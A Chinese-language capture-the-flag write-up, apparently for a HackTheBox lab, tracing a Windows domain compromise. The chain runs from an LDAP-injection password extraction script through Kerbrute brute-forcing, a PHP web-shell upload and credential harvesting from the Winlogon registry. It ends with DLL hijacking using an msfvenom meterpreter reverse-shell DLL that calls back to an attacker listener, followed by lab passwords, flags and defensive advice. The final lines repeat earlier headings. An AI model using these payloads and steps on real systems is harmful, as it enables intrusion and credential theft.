Windows域渗透实战：从LDAP注入到DLL劫持提权<\/h1>

1. 信息收集与初始访问<\/h2>

1.1 主机发现与端口扫描<\/h3>

使用Nmap进行快速扫描：<\/p>

nmap -sC -sV 10.10.11.250 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>1.2 DNS枚举与子域名发现<\/h3>
添加主机名到\/etc\/hosts：<\/p>
echo '10.10.11.250 analysis.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>使用Gobuster进行DNS枚举：<\/p>
gobuster dns -d analysis.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -r analysis.htb:53
<\/span><\/span><\/code><\/pre>发现子域名后更新hosts文件：<\/p>
echo '10.10.11.250 internal.analysis.htb gc._msdcs.analysis.htb domaindnszones.analysis.htb forestdnszones.analysis.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>1.3 Web目录枚举<\/h3>
对发现的子域名进行目录扫描：<\/p>
gobuster dir --url "http:\/\/gc._msdcs.analysis.htb"<\/span> --wordlist \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-small.txt -x php
<\/span><\/span>gobuster dir --url "domaindnszones.analysis.htb"<\/span> --wordlist \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-small.txt -x php
<\/span><\/span>gobuster dir --url "http:\/\/forestdnszones.analysis.htb"<\/span> --wordlist \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-small.txt -x php
<\/span><\/span><\/code><\/pre>发现关键文件：list.php<\/code><\/p>
2. LDAP注入攻击<\/h2>
2.1 发现LDAP注入点<\/h3>
使用Arjun工具寻找隐藏HTTP参数：<\/p>
arjun -u http:\/\/internal.analysis.htb\/users\/list.php
<\/span><\/span><\/code><\/pre>2.2 LDAP注入原理<\/h3>
LDAP注入是一种针对Web应用程序的攻击，利用用户输入构造LDAP语句。当应用程序未能正确对输入进行清理时，攻击者可以操纵LDAP语句，可能导致未经授权的访问或数据篡改。<\/p>
2.3 自动化LDAP注入脚本<\/h3>
编写Python脚本自动化LDAP注入攻击：<\/p>
import<\/span> requests
<\/span><\/span>import<\/span> string
<\/span><\/span>
<\/span><\/span>printable_characters =<\/span> string.<\/span>printable
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    print("[xxxx]Ldap Injection[xxxx]"<\/span>)
<\/span><\/span>    password =<\/span> ""<\/span>
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        for<\/span> char in<\/span> printable_characters:
<\/span><\/span>            url =<\/span> f<\/span>"http:\/\/internal.analysis.htb\/users\/list.php?name=*)(%26(objectClass=user)(description=<\/span>{<\/span>password}{<\/span>''<\/span> if<\/span> char ==<\/span> '*'<\/span> else<\/span> char}<\/span>*)"<\/span>
<\/span><\/span>            response =<\/span> requests.<\/span>get(url)
<\/span><\/span>            if<\/span> response.<\/span>status_code ==<\/span> 200<\/span> and<\/span> "technician"<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>                print("[+] Got char:"<\/span>, char)
<\/span><\/span>                password +=<\/span> char
<\/span><\/span>                break<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            break<\/span>
<\/span><\/span>    print("[*] Found password:"<\/span>, password)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>执行脚本获取密码：<\/p>
python3 exp.py
<\/span><\/span><\/code><\/pre>获取到密码：97NTtl*4QP96Bv<\/code><\/p>
3. 用户枚举与暴力破解<\/h2>
3.1 使用Kerbrute进行用户枚举<\/h3>
.\/kerbrute_linux_amd64 userenum --dc analysis.htb -d analysis.htb \/usr\/share\/seclists\/Usernames\/xato-net-10-million-usernames.txt -o recore.log
<\/span><\/span><\/code><\/pre>3.2 暴力破解用户密码<\/h3>
创建密码文件：<\/p>
echo "97NTtl*4QP96Bv"<\/span> > pass
<\/span><\/span><\/code><\/pre>执行暴力破解：<\/p>
.\/kerbrute_linux_amd64 bruteuser --dc analysis.htb -d analysis.htb pass technician@analysis.htb
<\/span><\/span><\/code><\/pre>4. Web应用登录与后门上传<\/h2>
4.1 登录Web应用<\/h3>
访问登录页面：<\/p>
http:\/\/internal.analysis.htb\/employees\/login.php
<\/code><\/pre>
使用获取的凭据登录：<\/p>

用户名: technician@analysis.htb<\/code><\/li>
密码: 97NTtl*4QP96Bv<\/code><\/li>
<\/ul>
4.2 上传PHP后门<\/h3>
上传以下PHP Web Shell（p0wny shell）：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 完整的p0wny shell代码
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>访问后门：<\/p>
http:\/\/internal.analysis.htb\/dashboard\/uploads\/p0wnyshell.php
<\/code><\/pre>
5. 内网横向移动<\/h2>
5.1 发现LDAP管理员凭据<\/h3>
在Web Shell中浏览文件系统：<\/p>
cd<\/span> C:\inetpub\internal\users
<\/span><\/span>type<\/span> list.php
<\/span><\/span><\/code><\/pre>发现新凭据：<\/p>

用户名: webservice@analysis.htb<\/code><\/li>
密码: N1G6G46G@G!j<\/code><\/li>
<\/ul>
5.2 发现数据库凭据<\/h3>
cd<\/span> C:\inetpub\internal\employees
<\/span><\/span>type<\/span> login.php
<\/span><\/span><\/code><\/pre>获取数据库信息：<\/p>

用户名: db_master<\/code><\/li>
密码: 0$TBO7H8s12yh&<\/code><\/li>
数据库名: employees<\/code><\/li>
<\/ul>
5.3 查询Windows自动登录凭据<\/h3>
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"<\/span>
<\/span><\/span><\/code><\/pre>发现自动登录凭据：<\/p>

用户名: jdoe<\/code><\/li>
密码: 7y4Z4^*y9Zzj<\/code><\/li>
<\/ul>
6. 使用Evil-WinRM获取用户权限<\/h2>
6.1 连接Evil-WinRM<\/h3>
evil-winrm -u jdoe -i analysis.htb -p '7y4Z4^*y9Zzj'<\/span>
<\/span><\/span><\/code><\/pre>6.2 获取用户Flag<\/h3>
type c:\Users\jdoe\Desktop\user.txt
<\/span><\/span><\/code><\/pre>用户Flag: 69fd805d8395acf243f107ae46250f81<\/code><\/p>
7. 权限提升：DLL劫持<\/h2>
7.1 发现DLL劫持机会<\/h3>
检查Snort目录权限：<\/p>
cd C:\snort\lib
<\/span><\/span>icacls snort_dynamicpreprocessor
<\/span><\/span><\/code><\/pre>权限分析：<\/p>

AUTORITE NT\Système<\/code> 和 BUILTIN\Administrateurs<\/code> 有完全控制权限(F)<\/li>
BUILTIN\Utilisateurs<\/code> 组有读取和执行权限(RX)，以及添加数据(AD)和写入数据(WD)的权限<\/li>
<\/ul>
7.2 生成恶意DLL<\/h3>
使用msfvenom生成反向shell DLL：<\/p>
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>tun0 LPORT=<\/span>10033<\/span> -f dll -o sf_engine.dll
<\/span><\/span><\/code><\/pre>设置监听器：<\/p>
msfconsole -x 'use exploit\/multi\/handler;set payload windows\/x64\/meterpreter\/reverse_tcp;set lport 10033;set lhost 10.10.16.15'<\/span>
<\/span><\/span><\/code><\/pre>7.3 上传并触发DLL<\/h3>
上传恶意DLL：<\/p>
cd C:\snort\lib\snort_dynamicpreprocessor
<\/span><\/span>upload sf_engine.dll
<\/span><\/span><\/code><\/pre>等待系统加载DLL，获取meterpreter会话。<\/p>
7.4 获取root Flag<\/h3>
type<\/span> c:\Users\Administrateur\Desktop\root.txt
<\/span><\/span><\/code><\/pre>root Flag: a9d18d734fc464d9903817c11491f134<\/code><\/p>
8. 关键知识点总结<\/h2>

LDAP注入<\/strong>：通过构造特殊查询字符串绕过认证获取敏感信息<\/li>
Kerbrute工具<\/strong>：高效的Kerberos用户枚举和暴力破解工具<\/li>
Evil-WinRM<\/strong>：利用WinRM服务进行远程命令执行<\/li>
DLL劫持<\/strong>：利用不当的目录权限部署恶意DLL实现权限提升<\/li>
Windows注册表分析<\/strong>：从注册表中提取自动登录凭据<\/li>
横向移动技术<\/strong>：通过多个凭据在内网中逐步提升权限<\/li>
<\/ol>
9. 防御建议<\/h2>

对LDAP查询实施严格的输入验证<\/li>
限制目录写入权限，特别是系统目录<\/li>
禁用不必要的自动登录功能<\/li>
定期审计服务账户凭据<\/li>
监控异常进程加载DLL的行为<\/li>
实施最小权限原则，限制用户对系统目录的写入权限<\/li>
<\/ol>

Windows域渗透实战：从LDAP注入到DLL劫持提权<\/h1>

1. 信息收集与初始访问<\/h2>

2.2 LDAP注入原理<\/h3> LDAP注入是一种针对Web应用程序的攻击，利用用户输入构造LDAP语句。当应用程序未能正确对输入进行清理时，攻击者可以操纵LDAP语句，可能导致未经授权的访问或数据篡改。<\/p>

4. Web应用登录与后门上传<\/h2>

5. 内网横向移动<\/h2>

6. 使用Evil-WinRM获取用户权限<\/h2>

2.2 LDAP注入原理<\/h3>
LDAP注入是一种针对Web应用程序的攻击，利用用户输入构造LDAP语句。当应用程序未能正确对输入进行清理时，攻击者可以操纵LDAP语句，可能导致未经授权的访问或数据篡改。<\/p>